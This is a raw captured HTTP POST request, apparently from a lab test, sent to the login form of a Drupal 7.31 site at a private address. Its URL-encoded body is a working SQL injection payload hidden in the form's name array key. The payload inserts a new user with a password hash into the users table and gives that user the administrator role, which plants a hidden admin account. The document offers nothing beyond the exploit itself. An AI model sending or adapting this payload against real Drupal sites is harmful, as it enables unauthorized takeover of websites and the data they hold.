POST http://192.168.44.129/drupal-7.31/?q=node&destination=node HTTP/1.1
Host: 192.168.44.129
Proxy-Connection: keep-alive
Content-Length: 414
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: Drupal.toolbar.collapsed=0; SESSf07dc2d6d7117ee28d92ae260b41f4ee=A7u2cpkZePc6hXEFxQpkt1c9mtobwmMGD5z0eH0yqRI; has_js=1

test=name%5B0%2520%3Binsert%2Binto%2B%7Busers%7D%2B%28uid%2Cname%2Cpass%2Cstatus%29%2Bvalues%2B%28987658%2C%27test4%27%2C%27%24S%24DrxHxKj6w11uEr04c1mBk.zeoEDoVgklllN2A3AOOJvooOfiqn9Y%27%2C1%29%3Binsert%2Binto%2B%7Busers_roles%7D%2B%28uid%2Crid%29%2Bvalues%28987658%2C3%29%3B%23%2520%2520%5D%3Dtest3%26name%5B0%5D%3Dtest%26pass%3Dshit2%26test2%3Dtest%26form_build_id%3D%26form_id%3Duser_login_block%26op%3DLog%2Bin


